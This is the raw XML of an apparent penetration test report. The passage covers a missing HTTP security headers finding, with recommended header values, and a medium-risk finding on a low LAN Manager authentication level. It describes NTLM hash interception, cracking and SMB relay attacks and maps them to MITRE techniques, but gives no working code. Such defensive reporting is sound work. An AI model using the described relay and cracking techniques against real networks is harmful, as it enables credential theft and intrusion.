      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="354DADEA">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A71161" w14:textId="4CEC378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1A8D985" w14:textId="0CEB6B9D">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72E4D21" w14:textId="3246F087">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R12dd85e54d0145cb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1189: Drive-by Compromise</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3AA0E26A" w14:textId="1EED8C16">
            <w:pPr>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a40e4346021a4a1b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1204.001: User Execution - Malicious Link</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="73F9905F">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235B5893"/>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AFEA38" w14:textId="0E066975">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6978947" w14:textId="394FE31D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R9e8668fab14d4248">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1021: Restrict Web-Based Content</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3740C725" w14:textId="3898D840">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R29c71a93ecae48d3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1050: Exploit Protection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1E86C4B1">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1B1B19" w14:textId="152A33DA">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4EF3114" w14:textId="6AB993FA">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285B9971" w14:textId="0971A39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E6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="6C4B1D6E" w14:textId="125B3F2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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="1248D3EB" w14:textId="663D547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The affected web servers lack the following recommended security headers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="39714F12" w14:textId="604596D7">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X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="0241052E" w14:textId="3F4727D0">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X-Content-Type-Options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="6CCBB682" w14:textId="1EE39720">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Strict-Transport-Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="082C4723" w14:textId="6F669F9C">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Referrer-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="44F5D99E" w14:textId="2588B4D7">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Permissions-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="4DD80690" w14:textId="42E0F5BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>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Content-Security-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6A33F69C" w14:textId="40D3C43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07911D11" w14:textId="1B9904C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These security headers are crucial for hardening web applications from common client-side attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="23F9BC94" w14:textId="4456105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14128AD5" w14:textId="4E2E9D8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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="68D6CE2D" w14:textId="743C347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The lack of security headers increases the attack surfaces for the affected hosts, allowing threat actors to exploit client-side vulnerabilities in web applications. These potential attacks can lead to hijacking user accounts by stealing their cookies or credentials. If a privileged account is compromised, sensitive customer and business data can be leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="54211ADA" w14:textId="60E3EDA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216BD990" w14:textId="7B613F2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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="78984838" w14:textId="40CEC0C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1: Run Nikto on the affected hosts and observe their security headers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="28ED1990" w14:textId="04283FB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69848AD4" w14:textId="7D4CAEB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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="34560936" w14:textId="4A6BAD2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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="42211310" w14:textId="6F3078E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>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recommended security headers </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="45EFF312">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</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all web applications. Provided below are the baseline recommendations, and they should be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modified</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as needed to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maintain</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functionality of the websites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="2410477C" w14:textId="6893CF59">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X-Frame-Options: SAMEORIGIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="4B382EAC" w14:textId="0335C89F">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X-Content-Type-Options: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nosniff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7023149B" w14:textId="6490E896">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Strict-Transport-Security: max-age=31536000;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includeSubDomains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="47721F1B" w14:textId="0AC66D4A">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Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="04C39917" w14:textId="3566F39D">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Permissions-Policy: accelerometer</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camera</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geolocation</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gyroscope</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magnetometer</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microphone</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payment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usb</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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="6D33A6D4" w14:textId="584ADFC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Content-Security-Policy: default-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src</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'self'; object-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src</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'none'; frame-ancestors 'none'; base-</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uri</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'self'; form-action 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="10EFFD4A" w14:textId="4FB60675">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Use the </w:t>
      </w:r>
      <w:hyperlink r:id="Rb8f1f42dcba34436">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>securityheaders</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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scanning tool to verify their implementati</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on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="78479F88" w14:textId="725B4178">
      <w:pPr>
        <w:bidi w:val="0"/>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5E8A85B0" w14:textId="3683909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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7CE3C0BE" w14:textId="03652B9A">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dbb6173853d34ec0">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mozilla - HTTP Headers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7B2CAD83" w14:textId="61513DD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5D8E1BB8" w14:textId="22ED3B8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7A2782AB" w14:textId="6064B538">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86220B2" w14:textId="39141B33">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28E42B9" w14:textId="7A7EF4C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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3DCDBD3C" w14:textId="5E7C725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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6B8D2C7B" w14:textId="71428E9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w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="479B2804" w14:textId="155871F1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="2D72519D" w14:textId="7167DF0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5CE6B94E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94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Low LAN Manager Authentication Level</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75"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4E28877A">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7574FE" w14:textId="4671DA8A">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453B8FC" w14:textId="5ABE7025">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EEDA5B" w14:textId="685F4841">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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="39C455C1">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FFCDAD8" w14:textId="65A9D111">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2BAD2238" w14:textId="68CA974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93EBA27" w14:textId="44F0069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81DBC04" w14:textId="4C1EDE0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aps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4DC9FD74">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1C2FD5A" w14:textId="053A81DD">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F37861F" w14:textId="7DBCDE0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2BFC02C9"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39D3C7C8"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3E61B295">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8D059E" w14:textId="00C62A27">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4BD014A" w14:textId="3AC9F3DA">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="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strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="20ABFAA6">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7E43EA1" w14:textId="118836F0">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E9A22A" w14:textId="606390B4">
            <w:pPr>
              <w:bidi w:val="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7999A37" w14:textId="5FE7DD08">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2dbcacc4bccd42dc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="35EE0356">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60CB4484"/>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AAC7822" w14:textId="63F8E6DC">
            <w:pPr>
              <w:bidi w:val="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5E2BAA0" w14:textId="4AB3C4CE">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R932ade7d67fe4cae">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1042: Disable or Remove Feature or Program</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3F0E692A" w14:textId="384BCD23">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R67844b69ab5741d9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1037: Filter Network Traffic</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3C242C53">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1F091CE" w14:textId="38D0B2B7">
            <w:pPr>
              <w:bidi w:val="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1770BE5" w14:textId="5137F31E">
            <w:pPr>
              <w:bidi w:val="0"/>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57280BE6" w14:textId="4ECB9EF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E6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="4C15E248" w14:textId="0313B3C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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="10182038" w14:textId="1B4A6AB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domain</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is configured with a low LAN Manager</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authentication level, whi</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h </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27DD2A4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows for</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the use of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ea</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k legacy authentication protocols such as NTLMv1 and LM hashing. These outdated protocols are vulnerable to various attacks including pass-the-hash, relay attacks, and offline cracking due to their weak cryptographic implementations compared to modern hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="09FB70EA" w14:textId="71B9D7D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53958DC9" w14:textId="05402E3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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="6B66EB47" w14:textId="32C697C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both </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l</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 xml:space="preserve">ow and high </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F5FED0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileged</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a</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cc</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ounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F61190E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’ NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F61190E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes</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being </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="519F45A8">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519F45A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntercept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ed and cracked through man</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DD5E629">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in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A2D93BA">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the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="48A590BA">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middle attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="606B134E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Additionally,</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unauthorized access </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C0138D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can be gained to the </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system</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SMB relay attacks, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7BB289E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allowing attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B265A38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
